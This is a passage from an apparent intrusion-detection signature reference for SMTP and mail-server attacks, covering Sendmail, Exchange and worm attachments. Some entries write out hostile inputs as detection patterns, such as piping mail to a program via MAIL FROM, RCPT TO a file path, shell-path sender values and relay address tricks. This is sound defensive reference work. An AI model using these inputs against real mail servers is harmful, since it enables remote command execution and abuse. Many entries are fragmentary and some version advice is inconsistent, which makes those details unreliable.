Signature Description: Some SMTP servers do not complain when issued the Command : MAIL FROM:
root@this_host RCPT TO: /tmp/nessus_test. This probably means that it is possible to send mail directly to files, which
is a serious threat, since this allows anyone to overwrite any file on the remote server. This security hole might be a
false positive, since some MTAs will not complain to this test and will just drop the message silently. This rule will
triggers when an attempt is made to send / symbol in SMTP to header.
Signature ID: 2005
Sendmail's from |program attempt
272
Signature Description: Some SMTP servers do not complain when issued the command : MAIL FROM: |testing . This
probably means that it is possible to send mail that will be bounced to a program, which is a serious threat, since this
allows anyone to execute arbitrary command on this host. This security hole might be a false positive, since some
MTAs will not complain to this test, but instead just drop the message silently. This rule will triggers when an attempt
is made to send / symbol in SMTP from header.
Signature ID: 2006
Sendmail DEBUG attack vulnerability
Signature Description: Sendmail is a Mail Transfer Agent, which is the program that moves mail from one machine to
another. Sendmail implements a general internetwork mail routing facility, featuring aliasing and forwarding, automatic
routing to network gateways, and flexible configuration. Sendmail 5.58 is vulnerable to a gain access. A successful
exploitation of this attack will allow an attacker to gain access to a system information. This rule will trigger when an
attempt is made to send debug pattern to smtp service. This issue is fixed in Sendmail 5.59 version. Administrators are
advice to upgrade Sendmail 5.59 version or later version.
Signature ID: 2007
Spam mail attempt
Signature Description: This rule triggers when a mail comes with <> (NULL) in MAIL FROM command of the mail
header. In most of the cases this could be a spam mail. But according to the RFC 821, NULL is absolutely allowed in
MAIL FROM command and it helps in preventing loops in error reporting (notification messages) between SMTP
servers.So this rule is a false positive if the mail is a notification message. Administrators are advised to monitor this
log for spam activity.
Signature ID: 2008
EXPN command buffer overflow vulnerability
Signature Description: Simple Mail Transfer Protocol is a TCP/IP protocol used in sending and receiving e-mail. A
remotely exploitable buffer-overflow vulnerability affects SMTP server. The problem lies in the code that handles the
'expn' command. A successful exploitation of this attack will allow an attacker to execute arbitrary code on the
vulnerable system. This rule will triggers when attacker sending an overly long argument to the 'expn' command.
Seattle Lab Software SLMail 3.0.2421 is vulnerable to a this kind of vulnerability.
Signature ID: 2009
Sendmail 'decode' flaw
Signature Description: Some remote SMTP server pipe mail sent to the 'decode' alias to a program. There have been in
the past a lot of security problems regarding this, as it would allow crackers to overwrite arbitrary files on the remote
server. We suggest you deactivate this alias.
Signature ID: 2010
MS Exchange server SMTP DoS
Signature Description: The Simple Mail Transfer Protocol (SMTP) service in Microsoft Windows and Exchange is
273
vulnerable to a denial of service attack.attacker sends a malformed BDAT data transfer command to an affected server,
the attacker can cause the SMTP service to fail. The SMTP service must be restarted to regain normal functionality.
Signature ID: 2011
MS Exchange Server SMTP DoS with content of b00mAUTH LOGIN
Signature Description: The Simple Mail Transfer Protocol service in Microsoft Exchange Server is vulnerable for DoS
attacks. Attacker sends malformed requests to SMTP Service on MS Exchange servers.The service will restart
automatically, but all the connections established at the time of the attack will be dropped.
Signature ID: 2012
Microsoft SMTP Service Malformed Command Denial of Service Vulnerability
 messages between computers. Most e-mail systems that send mail over the Internet use SMTP to send messages
from one server to another. Simple Mail Transfer Protocol(SMTP) service in Microsoft Windows and Exchange is a
denial of service vulnerability. This rule will trigger when a remote attacker sends a malformed "BDAT" data transfer
command to an affected server. The successful exploitation of this issue will allow an attacker to cause the SMTP
service to fail. Apply the appropriate patch for removing this issue, which is available at vendor's web site.
Signature ID: 2013
Sendmail program piped aliases check
Signature Description: An attacker can collect information about sendmail aliases that are piped to programs. It is
common to define aliases that pipe received mail to a program for processing. This signature generates an event when
an attacker try to send expn command with argument root in Sendmail program.
Signature ID: 2014
Sendmail program piped aliases check with expn and "majordomo"
common to define aliases that pipe received mail to a program for processing. This signature detects attacks, when the
Sendmail program send command is expn with argument is majordomo.
Signature ID: 2015
Sendmail program piped aliases check with expn and "postmaster"
Sendmail program send command is expn with argument is POSTMASTER.
274
Signature ID: 2016
Sendmail program piped aliases check with expn and "news"
Sendmail program send command is expn with argument is NEWS.
Signature ID: 2018
Sendmail program piped aliases check with expn and "admin"
Sendmail program send command is expn with argument is ADMIN.
Signature ID: 2019
Sendmail program piped aliases check with expn and "webmaster"
Sendmail program send command is expn with argument as WEBMASTER.
Signature ID: 2020
Sendmail program piped aliases check with expn and "uucp"
Sendmail program send command is expn with argument as UUCP.
Signature ID: 2021
Sendmail (8.6.9) identd check
Signature Description: A vulnerability in version 8.6.9 of Berkeley Sendmail allows remote users to execute arbitrary
commands on vulnerable systems. This module ust be run as 'root', with the system's identd daemon disabled. If the
remote mailer does not support the ident protocol, the module will wait for an ident connection for several seconds
before reporting a site not vulnerable.
Signature ID: 2022
Sendmail 8.6.11 Denial of Service Vulnerability
from one server to another. This signature detects the content '8.6.11'. This 8.6.11 version check module examines
available sendmail banners to determine the presence of Berkeley sendmail 8.6.11. If this version is detected, it is
possible that the host is vulnerable to a denial of service.
275
Signature ID: 2023
Sendmail 8.6.12 Denial of Service Vulnerability
from one server to another. This signature detects the content '8.6.12'. This 8.6.12 version check module examines
available sendmail banners to determine the presence of Berkeley sendmail 8.6.12. If this version is detected, it is
possible that the host is vulnerable to a denial of service.
Signature ID: 2024
Sendmail (8.7.5) GECOS field buffer overflow check
Signature Description: An attacker can check to see if the host is running sendmail 8.7.5. Berkeley sendmail 8.7.5 has
two bugs which allow for local users to gain either default user (most often daemon) or root privileges.
Signature ID: 2025
Sendmail (8.8.0/8.8.1) MIME buffer overflow check with version 8.8.0
Signature Description: An attacker can check if you are running sendmail version 8.8.0 or 8.8.1. Both these versions of
sendmail have a vulnerability which could allow intruders to access the vulnerable system as root.
Signature ID: 2026
Sendmail (8.8.0/8.8.1) MIME buffer overflow check with version of 8.8.1
Signature Description: An attacker can discern if you are running sendmail version 8.8.0 or 8.8.1. Both of these
versions of sendmail have a weakness which could allow intruders to access the vulnerable system as root.
Signature ID: 2027
Mail forgery check using Cybercop
Signature Description: Cybercop is software which is used to find vulnerabilities on the target system. Using this
software attacker can know the vulnerabilities on the target system, and it is possible to forge mails on the target mail
server.
Signature ID: 2028
Sendmail (8.8.3/8.8.4) Version check for MIME Buffer Overflow
Signature Description: An attacker can attempt to discern if you are running sendmail version 8.8.4 or 8.8.3. Both of
these versions of sendmail have a weakness which can allow intruders to access the vulnerable system as root.
276
Signature ID: 2029
Sendmail (8.8.3/8.8.4) MIME buffer overflow check with version of 8.8.4
Signature Description: An attacker can attempt to check if you are running sendmail version 8.8.4 or 8.8.3. Both of
these versions of sendmail have a vulnerability which may allow intruders to access the vulnerable system as root.
Signature ID: 2030
Sendmail.cf Relaying vulnerability
Signature Description: There is vulnerability in sendmail.cf. Using this vulnerability an attacker can determine if your
mail server can be used as a mail gateway or relay. When used as a mail relay, your host may be prone to "spammers"
relaying mail through your host to reach their intended audience.If a remote attacker sends an email message using
"user%domain@" as the format for the recipient address, the attacker could then use the sendmail server as an open
mail relay. For example, if an outside user were to send mail formatted as being to
"target%[email protected]" that message could be re-transmitted to the target recipient,
apparently originating from your mail server.
Signature ID: 2032
SmartMax Mail-Max Remote Buffer Overflow Vulnerability
Signature Description: Smartmax MailMax is an email server for Windows 95/98/NT. Smartmax MailMax 1.0.0 is
vulnerable to buffer overflow. This attacks against the SMTP-command processing function in SMTP server. A
successful exploitation of this attack will allow attacker to execute arbitrary commands with the privileges of the user
running MailMax. This rule will triggers when an attempt is made to exploit this vulnerability.
Signature ID: 2033
Cmail User Leak vulnerability
Signature Description: CMailServer is an email mail server software for Windows, which provide web based email
service. CMailServer is also an anti-virus mail server and anti-spam email server. It's easy to control pop3/smtp mail
connections. This web mail server provides an open developing interface for web developers who want to customize
the web mail pages. CMailServer is vulnerable to a system usernames verify vulnerability. This rule generates an event
when an attacker access user names.
Signature ID: 2036
IMail's whois32 service can be remotely crashed.
Signature Description: IMail is a popular multi-protocol mail server for Windows NT environments. The Whois32
service included in the IMail package. Whois32 service is vulnerable to a buffer overflow vulnerability. A successful
exploitation of this vulnerability allows an attacker to execute arbitrary commands on the vulnerable system.
Signature ID: 2038
Windows NT - SLmail v3.1 Denial of Service Vulnerability
Signature Description: SLMail is described by the vendor as a "security conscious Windows NT/ 2000 email server".
277
This rule will trigger when the packet has a pattern 'SLmail v3.1'. This attack will raise the CPU usage of the
slsmtp.exe process to almost 100%.
Signature ID: 2039
Microsoft Exchange Server Invalid MIME Header charset = "" DoS Vulnerability
Microsoft. Microsoft Exchange Server, version 5.5, is a denial of service vulnerability. This rule will trigger when an
attacker send an email with malformed MIME headers with an empty value for charset. The successful exploitation of
this issue will allow an attacker to cause the information Store service to fail and crash the Exchange server.
Signature ID: 2040
W32/Frethem Malicious Code
Signature Description: W32/Frethem is a malicious Windows program with an internal SMTP mail delivery agent.
W32/Frethem arrives as an email message containing three MIME parts (multipart/alternative,
boundary=L1db82sd319dm2ns0f4383dhG) with the subject "Re: Your password!" The body of the message is
contained in the first MIME part and includes a specially crafted IFRAME tag that will cause the malicious attachment
to be executed when this part is rendered in a vulnerable mail user agent+D3.
Signature ID: 2041
IMC SMTP EHLO Buffer Overrun vulnerability
Signature Description: The Internet Mail Connector (IMC) provides SMTP functionality for the Microsoft Exchange
Server. The Internet Mail Connector in Exchange Server 5.5 is vulnerable to a buffer overflow in the code that handles
Extended Hello (EHLO) commands, which are used to query other servers to obtain a list of supported SMTP
operations. A successful exploitation of this attack will allow an attacker to execute arbitrary code with the privileges
of system. This rule will triggers when an attempt is made to exploit this vulnerability. Upgrade the patches are
available from vendors web site.
Signature ID: 2050
SMTP From comment overflow+D64
Signature Description: A vulnerability exists in the Sendmail MTA Daemon that could allow an attacker the
opportunity to gain root access. A programming error exists such that a buffer overflow can be caused using the header
fields in an SMTP session. Using the '<' and '>' characters in the 'from' field, an attacker can increment a counter to the
extent that the buffer exceeds it's limit.
Signature ID: 2051
VIRUS OUTBOUND .hsq file attachment
Signature Description: Virus is a computer program that can copy itself and infect a computer without permission or
knowledge of the user. The team 'virus' is also commonly used, to refer to many different types of malware and adware
programs. This rule will trigger when attach '.hsq' file then blocks the attachment. When a prohibited attachment has
been blocked, it will not deliver the attachment to the recipient but the message will still be delivered. The sender will
not receive any notification that the attachment has been removed.
278
Signature ID: 2052
VIRUS OUTBOUND .com file attachment
Signature Description: This event indicates that an outgoing email message possibly containing a virus has been
detected. This rule generates an event when a filename extension commonly used by viruses is detected. Virus is a
computer program that can copy itself and infect a computer without permission or knowledge of the user. The team
'virus' is also commonly used, to refer to many different types of malware and adware programs. This rule will trigger
when attach '.com' file then blocks the attachment. When a prohibited attachment has been blocked, it will not deliver
the attachment to the recipient but the message will still be delivered. The sender will not receive any notification that
the attachment has been removed.
Signature ID: 2053
VIRUS OUTBOUND .sys file attachment
programs. This rule will trigger when attach '.sys' file then blocks the attachment. When a prohibited attachment has
Signature ID: 2054
VIRUS OUTBOUND .vxd file attachment
programs. This rule will trigger when attach '.vxd' file then blocks the attachment. When a prohibited attachment has
Signature ID: 2055
VIRUS OUTBOUND .dll file attachment
programs. This rule will trigger when attach '.dll' file then blocks the attachment. When a prohibited attachment has
Signature ID: 2056
VIRUS OUTBOUND .cpp file attachment
programs. This rule will trigger when attach '.cpp' file then blocks the attachment. When a prohibited attachment has
279
Signature ID: 2057
VIRUS OUTBOUND .diz file attachment
detected. This rule generates an event when a filename extension commonly used by viruses is detected. This signature
generate log for .diz file attachment.
Signature ID: 2058
VIRUS OUTBOUND .bat file attachment
detected. This rule generates an event when a filename extension commonly used by viruses is detected. This signature
generate log for .bat file attachment.
Signature ID: 2059
VIRUS OUTBOUND .ini file attachment
programs. This rule will trigger when attach '.ini' file then blocks the attachment. When a prohibited attachment has
Signature ID: 2060
VIRUS OUTBOUND .reg file attachment
programs. This rule will trigger when attach '.reg' file then blocks the attachment. When a prohibited attachment has
Signature ID: 2061
VIRUS OUTBOUND .chm file attachment
detected. This rule generates an event when a filename extension commonly used by viruses is detected.
Signature ID: 2062
VIRUS OUTBOUND .hta file attachment
programs. This rule will trigger when attach '.hta' file then blocks the attachment. When a prohibited attachment has
280
Signature ID: 2066
SMTP Client [Novarg Worm]
Signature Description: The Novarg worm (also known as Mydoom) infects systems through email attachments and p2p
file sharing. The targets are all win32 computers. Once infected the worm installs a backdoor, allowing an attacker
remote access to the system. It also uses its own SMTP engine to send out email messages. This rule will trigger when
the packet contains pattern 'message.zip'.
Signature ID: 2067
Signature Description: This rule get hits when the packet contains pattern 'document.zip'. The Novarg worm (also
known as Mydoom) infects systems through email attachments and p2p file sharing. The targets are all win32
computers. Once infected the worm installs a backdoor, allowing an attacker remote access to the system. It also uses
its own SMTP engine to send out email messages.
Signature ID: 2068
remote access to the system. It also uses its own SMTP engine to send out email messages. This rule will trigger when
the packet has pattern 'readme.zip'.
Signature ID: 2069
Signature Description: This signature will trigger when packet has pattern 'doc.bat'. The Novarg worm (also known as
Mydoom) infects systems through email attachments and p2p file sharing. The targets are all win32 computers. Once
infected the worm installs a backdoor, allowing an attacker remote access to the system. It also uses its own SMTP
engine to send out email messages.
Signature ID: 2070
remote access to the system. It also uses its own SMTP engine to send out email messages. This event get hits when
packet has pattern 'hello.cmd'.
Signature ID: 2071
Signature Description: This rule get hits when packet has pattern 'data.txt.exe'. The Novarg worm (also known as
Mydoom) infects systems through email attachments and p2p file sharing. The targets are all win32 computers. Once
281
Signature ID: 2072
Signature Description: This signature detects when the packet contains pattern 'file.scr'. The Novarg worm (also known
as Mydoom) infects systems through email attachments and p2p file sharing. The targets are all win32 computers. Once
Signature ID: 2073
remote access to the system. It also uses its own SMTP engine to send out email messages. This signature will trigger
when the packet contains pattern body.scr.
Signature ID: 2074
Signature Description: This signature will trigger when the packet has pattern text.pif. The Novarg worm (also known
as Mydoom) infects systems through email attachments and p2p file sharing. The targets are all win32 computers. Once
Signature ID: 2075
remote access to the system. It also uses its own SMTP engine to send out email messages. This rule get hits when
packet contains pattern 'text.htm.pif'.
Signature ID: 2076
Microsoft Exchange Server Extended Verb XEXCH50 Request Buffer Overflow Vulnerability
Microsoft. Microsoft Exchange 5.5 and Microsoft Exchange 2000 are vulnerable to a buffer overflow, caused by
improper bounds checking. XEXCH50 is the Exchange extension SMTP that is used to relay certain message
properties such as envelope message and recipient properties. The Exchange Server allows the command verb
XEXCH50 before the NTLM authentication. A malicious attacker could craft an SMTP extended verb request using a
negative number or a very large positive number. By connecting to an SMTP port on the vulnerable Exchange server, a
remote attacker could send a specially crafted XEXCH50 request to overflow a buffer and cause the SMTP service to
fail and execute arbitrary code on the system with Local System privileges. Apply the appropriate patch for your
system, as listed in Microsoft Security Bulletin MS03-046.
282
Signature ID: 2098
VIRUS OUTBOUND bad file attachment
Signature Description: This event may indicate a possible virus infection of a host on the protected network.Viruses
may propogate in many different ways. Many arrive in the form of email attachments that an unsuspecting user may
trigger by opening the attachment. Once infected, many viruses have the ability to use the infected host as a means of
spreading copies of itself to other machines on the protected and external networks.
Signature ID: 2200
CSM Mailserver HELO Buffer Overflow Vulnerability
Signature Description: CSM Mailserver has an unchecked buffer in the code that handles the HELO command. CSM
mail server is a buffer overflow Vulnerability. This rule will trigger when an attacker sending a long HELO command
(above 120000 bytes). The successful exploitation of this issue will allow an attacker to crash the system or execute
arbitrary code or denial of service. No remedy available as of October, 2008.
Signature ID: 2201
VIRUS Klez Incoming
Signature Description: This W32/Klez variant has the ability to spoof the email 'FROM:; field. The senders address
used by the virus, may be one that was found on the infected user's system. It may appear that you have received this
virus from one person, when it was actually sent from a different user's system. Viewing the entire email header will
display the actual senders address.This worm makes use of Incorrect MIME Header Can Cause IE to Execute E-mail
Attachment vulnerability in Microsoft Internet Explorer.This worm arrives in an Email message with a subject and
body randomly composed from a rather long pool of strings that the virus carries inside itself the virus can also add
other strings The vulnerable version are Microsoft Internet Explorer 5.01 or 5.5 without SP2.
Signature ID: 2202
Remote Pine denial of service
Signature Description: Pine is a Program for Internet News & Email, it is a tool for reading, sending, and managing
electronic messages. Pine was developed by UW Technology at the University of Washington. Pine 4.44 and earlier
versions are vulnerable to denial of service attack. By sending an email message with a specially-crafted sender address
in the "From:" message header, a remote attacker could overflow a buffer and cause to crash, these versions failed to
parse it correctly, resulting in a core dump. Execution of arbitrary code may be possible. The message must be
manually removed from the message spool.
Signature ID: 2203
SMTP AUTH LOGON brute force attempt Vulnerability
Signature Description: Brute force is a trial and error method used by application programs to decode encrypted data
such as passwords or Data Encryption Standard Keys. An attempt is made to logon by SMTP using brute force
methods. This rule will trigger when 'Authentication unsuccessful' is detected in packet.
283
Signature ID: 2204
Microsoft SSL PCT buffer overflow attempt
Signature Description: A buffer overrun vulnerability exists in the Private Communications Transport (PCT) protocol,
which is part of the Microsoft Secure Sockets Layer (SSL) library. Only systems that have SSL enabled, and in some
cases Windows 2000 domain controllers, are vulnerable. An attacker who successfully exploited this vulnerability
could take complete control of an affected system.All programs that use SSL could be affected. Although SSL is
generally associated with Internet Information Services by using HTTPS and port 443, any service that implements
SSL on an affected platform is likely to be vulnerable. Here the signature looks for SSL PCT associated with SMTP
(port 465). This includes but is not limited to, Microsoft Internet Information Services 4.0, Microsoft Internet
Information Services 5.0, Microsoft Internet Information Services 5.1, Microsoft Exchange Server 5.5, Microsoft
Exchange Server 2000, Microsoft Exchange Server 2003, Microsoft Analysis Services 2000 (included with SQL Server
2000), and any third-party programs that use PCT (MS04-011).
Signature ID: 2205
SMTP Content-Transfer-Encoding overflow Vulnerability
Signature Description: This rule tries to find a buffer overflow associated with Content-Transfer-Encoding field in
MIME header for SMTP. Normally since the name of encoding technique appears in that field name, this field won't be
more than few characters and character sequence \r\n (0d 0a) is used to specify end of the field. But if no \r\n sequence
is appeared in this field say upto 100 charcters, then definitely it is an indication for buffer overflow attack.
Signature ID: 2206
SMTP ETRN overflow attempt
Signature Description: A buffer overflow in the NetWin DSMTP 2.7q in the NetWin dmail package allows remote
attackers to execute arbitrary commands via a long ETRN request.NetWin DMail 2.8a-h and prior,NetWin DMail 2.7q
and prior are vulnerable to this attack. Successful attacker can crash the mail server or he can execute arbitrary code
with root access.
Signature ID: 2207
Sendmail Header Processing Buffer Overflow Vulnerability
routing to network gateways, and flexible configuration. Sendmail, version 5.79 to 8.12.7, is a buffer overflow
vulnerability. This rule will trigger when an attacker sending an email with specially-crafted "From", "To", or "CC"
header field, a remote attacker could bypass the "skipping" mode email header check and overflow a buffer to gain root
access to the affected system. This issue is fixed in Sendmail 8.12.8. Administrators are advice to update 8.12.8 version
Signature ID: 2208
SMTP MAIL FROM sendmail prescan too long addresses overflow
284
routing to network gateways, and flexible configuration. Sendmail 5.2 to 8.12.7 are vulnerable to a buffer overflow in
the SMTP header parsing component, caused by certain conversions from char and int types. A successful exploitation
of this attack will allow an attacker to execute arbitrary code on the vulnerable system. This vulnerability is fixed in the
Sendmail 8.12.9. Administrators are advised to update the product. This rule will triggers when attacker sending MAIL
FROM formatted address field.
Signature ID: 2209
SMTP MAIL FROM sendmail prescan too many addresses overflow
the SMTP header parsing component, caused by improper bounds checking of user suppled data. A successful
exploitation of this attack will allow an attacker to execute arbitrary code on the vulnerable system. This vulnerability
is fixed in the Sendmail 8.12.8. Administrators are advised to update the product. This rule will triggers when attacker
sending MAIL FROM formatted addres field.
Signature ID: 2210
SMTP RCPT TO decode attempt Vulnerability
routing to network gateways, and flexible configuration. Sendmail versions prior to 8.6.12 could allow a remote
attacker to execute arbitrary commands. This signature detects when an attacker sending invalid "Mail FROM" and
"RCPT TO" addresses. The successful exploitation of this issue will allow an attacker to gain root access on the
affected machine.
Signature ID: 2211
SMRP RCPT TO Command with Command Argument Length Exceeding 300 Bytes
Signature Description: SMTP RCPT TO command is used to identify an individual recipient of the mail data. The
argument field contains a forward-path (normally consists of destination mail box and/or relay hosts) and may contain
optional parameters. This rule triggers when an attempt is made to send to a packet with long RCPT TO argument.
Products like IPSwitch IMail Server 2006 and Lotus Domino SMTP Server 5 are vulnerable to this type of attack.
Signature ID: 2212
SMTP RCPT TO sendmail prescan too long addresses overflow
285
Sendmail 8.12.9. Administrators are advised to update the product. This rule will triggers when attacker sending SEND
RCPT TO formatted address field.
Signature ID: 2213
SMTP RCPT TO sendmail prescan too many addresses overflow
Signature Description: This rule hits when an attempt is made to exploit a known prescan function vulnerability in the
older versions of Sendmail.Vulnerability exists in the prescan() function used in Sendmail prior to version 8.12.9.
Prescan function fails when converting a character to an integer value while processing SMTP headers. An attacker
could exploit this condition by sending large string to the prescan function.
Signature ID: 2214
SMTP SAML FROM sendmail prescan too long addresses overflow
sending SAML FROM formatted addres field.
Signature ID: 2215
SMTP SAML FROM sendmail prescan too many addresses overflow
Signature Description: A buffer overflow in Sendmail 5.79 to 8.12.8 allows remote attackers to execute arbitrary code
via certain formatted address fields, related to sender and recipient header comments as processed by the crackaddr
function of headers.c . A vulnerability exists in the prescan() function used in Sendmail prior to version 8.12.9. This
function contains an error when converting a character to an integer value while processing SMTP headers.
Signature ID: 2216
SMTP SEND FROM sendmail prescan too long addresses overflow
Sendmail 8.12.9. Administrators are advised to update the product. This rule will triggers when attacker sending SEND
FROM formatted addres field.
Signature ID: 2217
SMTP SEND FROM sendmail prescan too many addresses overflow
286
sending SEND FROM formatted addres field.
Signature ID: 2218
SMTP SOML FROM sendmail prescan too long addresses overflow
Sendmail 8.12.9. Administrators are advised to update the product. This rule will triggers when attacker sending SOML
FROM formatted addres field.
Signature ID: 2219
SMTP SOML FROM sendmail prescan too many addresses overflow
sending SOML FROM formatted addres field.
Signature ID: 2220
SMTP VRFY overflow vulnerability
Signature Description: Simple Mail Transfer Protocol is a TCP/IP protocol used in sending and receiving e-mail. A
remotely exploitable buffer-overflow vulnerability affects SMTP server. The problem lies in the code that handles the
'VERFY' command. A successful exploitation of this attack will allow an attacker to execute arbitrary code on the
vulnerable system. This rule will triggers when attacker sending an overly long argument to the 'VERFY' command.
Signature ID: 2221
SMTP WinZip MIME content-disposition buffer overflow
Signature Description: A buffer overflow error exists in the way that WinZip handles certain parameters of MIME
archives.This error results in a vulnerability when WinZip attempts to interpret invalid data in a MIME-encoded file.An
attacker could exploit this vulnerability by introducing a specially-crafted file to be opened by WinZip, and then
coaxing or tricking a user or application into opening it. The malicious file could be introduced in a number of ways
287
including, but not limited to, a remote web page, an email attachment, peer-to-peer file sharing, or network
filesystems.WinZip 6.2 through WinZip 8.1 SR-1, and possibly other packages are vulnerable to this attack. 
Signature ID: 2222
SMTP WinZip MIME content-type buffer overflow
Signature Description: A buffer overflow error exists in the way that WinZip handles certain parameters of MIME
archives.This error results in a vulnerability when WinZip attempts to interpret invalid data in a MIME-encoded file.An
attacker could exploit this vulnerability by introducing a specially-crafted file to be opened by WinZip, and then
coaxing or tricking a user or application into opening it. The malicious file could be introduced in a number of ways
including, but not limited to, a remote web page, an email attachment, peer-to-peer file sharing, or network
filesystems.Winzip 6.x, 7.x, 8.0, 8.1 SR-1, 8.1, Winzip 9.0 beta versions are vulnerable to this attack.
Signature ID: 2223
Microsoft Exchange Server Extended Verb XEXCH50 Request Buffer Overflow Vulnerability
Signature Description: Microsoft Exchange is a popular collaboration product which includes extensive support for
electronic mail, including support for SMTP. SMTP is a standard protocol for exchanging electronic mail over the
internet. Exchange uses SMTP to communicate special handling instructions from one Exchange server to another
through the use of SMTP extended verbs. Exchange fails to process XEXCH50 command correctly. Exchange 5.5 and
Exchange 2000 are vulnerable. A successful exploitation of this attack will allow attacker to execute arbitrary
commands with user privileges. This rule will triggers when an attempt is made to exploit this vulnerability. Apply a
patch as described in Microsoft Security Bulletin MS03-046.
Signature ID: 2224
NetManage Chameleon SMTP Buffer Overflow Vulnerability
Signature Description: Chameleon is a suite of Internet services offered by NetManage. NetManage Chameleon 4.5
and NetManage Chameleon Unix 97 are contains a buffer overflow vulnerability that may be remotely exploitable.
This vulnerability is in the argument to the HELP command. A successful exploitation will allow an attacker to execute
arbitrary commands with user privileges. This rule will triggers when an attempt is made to exploit this vulnerability.
Signature ID: 2225
SMTP Server Scanning with Cybercop using EHLO Command
Signature Description: Cybercop Scanner is scanning software that searches for system vulnerabilities. It sends an
EHLO command to SMTP server ports to determine if the SMTP server will return a list of remote commands that it
accepts. Attacker then issues Vulnerable and Accepted Commands to the SMTP Server.
Signature ID: 2226
SMTP exchange mime DOS
Signature Description: Microsoft Exchange Server 5.0 and 5.5 are unable to process emails that contain malformed
MIME headers with an empty value for charset. In the event that Exchange Server receives an email with an invalid
288
MIME header, Exchange would cease to operate. Restarting the service and deleting the offending email would be
required in order to regain normal functionality. In order to determine the offending email, restart Exchange. The
hostile email would then appear at the front of the queue.
Signature ID: 2227
SMTP Malformed expn Command attempt
Signature Description: The SMTP Servers are vulnerable to DOS attacks if a remote attacker sends a specific set of
commands to the server process to cause the system to consume all available memory and disk space and increase CPU
usage to 100%.This event is generated when an attempt is made to send a malformed request to an SMTP server which
may cause a Denial of Service. SMTP provides useful commands like EXPN. The EXPN command is used to know the
user accounts on the SMTP Server. Attacker uses this command to know the user accounts or to lead DoS by sending
specially crafted EXPN Command to the SMTP server. Attacker first telnet to the SMTP server and then issues MAIL
FROM and RCPT TO Commands, after that he sends EXPN Command followed with *@ , this command leads SMTP
Server to DoS. Vixar MailServer for Windows is vulnerable to this attack. It is recommended that if EXPN Service is
not needed then disable the EXPN command on the SMTP server.
Signature ID: 2228
SMTP Cybercop attempt with EXPN service
Signature Description: Cybercop Scanner is scanning software that searches for system vulnerabilities. It sends an expn
command to SMTP server ports to determine the SMTP server will return a list of email addresses, aliases, and
distribution lists. If SMTP Server response for the EXPN Request, attacker knows the sensitive information on the
SMTP server. If EXPN service is not needed, it is recommended that to disable the EXPN service on the SMTP server.
Signature ID: 2229
Majordomo lists Command Execution Vulnerability
Signature Description: Majordomo is a perl-based Internet e-mail list server. Great Circle Associates Majordomo 1.90
and Great Circle Associates Majordomo 1.89 are vulnerable to an attack when specially crafted e-mail headers are
incorrectly processing. This is possible only when "advertise" or "no advertise" directives are specified in the
configuration files. A successful exploitation of this attack will allow an attacker to execute arbitrary commands with
user privileges. This rule will triggers when an attempt is made to exploit this vulnerability. Upgrade latest versions
available from vendors web site.
Signature ID: 2230
SMTP rcpt to command attempt
Signature Description: A vulnerability exists in older versions of Sendmail associated with the debug mode.
Malformed text specifying the recipient could be a command that would execute at the privilege level of Sendmail,
often times root. The "sed" command is used to strip off the mail headers before executing the supplied command. This
vulnerability was exploited by the Morris worm. Sendmail versions prior to 5.5.9 are vulnerable to this attack.
289
Signature ID: 2231
SMTP sendmail 5.5.5 MAIL FROM Parse Vulnerability
Signature Description: Older versions of sendmail, i.e before 8.6.10 are fails to process malformed Message headers,
leading to remote command execution as root. All the Verstions of sendmail based on 5.x. are vulnerable to this attack.
Attacker sends a crafted MAIL FROM Message to the server. Then the Server will execute the command. A Successful
attack allows remote execution of commands with the root privileges. Upgrade to version 8.6.10 or higher of Sendmail.
Signature ID: 2232
SMTP sendmail 5.6.5 MAIL FROM command Vulnerability
Signature Description: Older versions of sendmail are vulnerabile for Message Header parsing vulnerabilty. Remote
attackers can exploits this by sending a malformed MAIL FROM value such as /usr/bin/tail or /usr/bin/sh alias
/usr/ucb/tail and by placing shell code as the message. The Received server executes the shell code in the context of
server causing remote root compromise. This vulnerability involves sending malformed "mail from" or "rcpt to"
addresses that cause sendmail to inappropriately redirect data to another program. All the Systems running Sendmail
versions lower than 8.6.10 are vulnerable to this attack.
Signature ID: 2233
SMTP sendmail 8.6.10 exploit via IDENT message with tab character
Signature Description: Sendmail 8.6.10 allows remote attackers to execute root commands, using ident.Sendmail
version 8.6.10 connects back to the ident service to log user information. This version of Sendmail does not validate the
information returned by the client. If the response by the client to Sendmail contains special character like tab (\t)
character, sendmail fails to parse the response received. attacker can execute his exploits via this attack to gain full
control on the affected system.Systems running unpatched versions of Sendmail 8.6.10 or earlier are vulnerable to this
attack.
Signature ID: 2234
SMTP sendmail 8.6.9 IDENT remote root command excecution attempt
Signature Description: Sendmail 8.6.9 allows remote attackers to execute root commands, using ident.Sendmail
version 8.6.9 connects back to the ident service to log user information. This version of Sendmail does not validate the
information returned by the client. If the response by the client to Sendmail is longer than expected, the response
overflows the buffer. This condition could allow a remote attacker to execute commands on the host system and gain
privileged access to the system.Eric Allman Sendmail 8.6.9 is vulnerable to this attack.Upgrade to at least version
8.6.10 of sendmail.
Signature ID: 2235
SMTP sendmail 8.6.9c IDENT Remote root exploit
Signature Description: Sendmail 8.6.9c allows remote attackers to execute root commands, using ident.Sendmail
version 8.6.9c connects back to the ident service to log user information. This version of Sendmail does not validate the
290
information returned by the client. If the response by the client to Sendmail is longer than expected, the response
overflows the buffer. This condition could allow a remote attacker to execute commands on the host system and gain
privileged access to the system.Eric Allman Sendmail 8.6.9 is vulnerable to this attack.Upgrade to at least version
8.6.10 of sendmail.
Signature ID: 2237
SMTP vrfy decode
Signature Description: This event is generated when a remote user attempts to scan for a vulnerability in the VRFY
command on internal SMTP servers.A remote attacker can send mail to the decode or uudecode alias that is present on
some systems to create or overwrite files on the remote host. This allows an attacker to gain remote access to the
system.
Signature ID: 2238
SMTP vrfy root
Signature Description: This event is generated when an external attacker uses the "vrfy root" command to find the
login name or mail alias of the system administrator.The VRFY command may be used to check the validity of an
account
Signature ID: 2239
SMTP BCC command overflow vulnerability
Signature Description: This rule tries to detect an attempt to overflow the 'BCC' field in SMTP header. Exim version
4.32 is vulnerable to stack-based buffer overflow, caused by improper bounds checking in the SMTP header. If the
headers_check_syntax setting is enabled in the exim.conf configuration file, which is not the default setting, a remote
attacker could exploit this vulnerability to overflow a buffer and possibly execute arbitrary code on the vulnerable
system. Upgrade to the latest version of exim(3.35 or later) to resolve this issue.
Signature ID: 2240
SMTP CC command overflow vulnerability
Signature Description: This rule tries to detect an attempt to overflow the 'CC' field in SMTP header. Exim version
Signature ID: 2241
SMTP Content-Encoding overflow attempt vulnerability
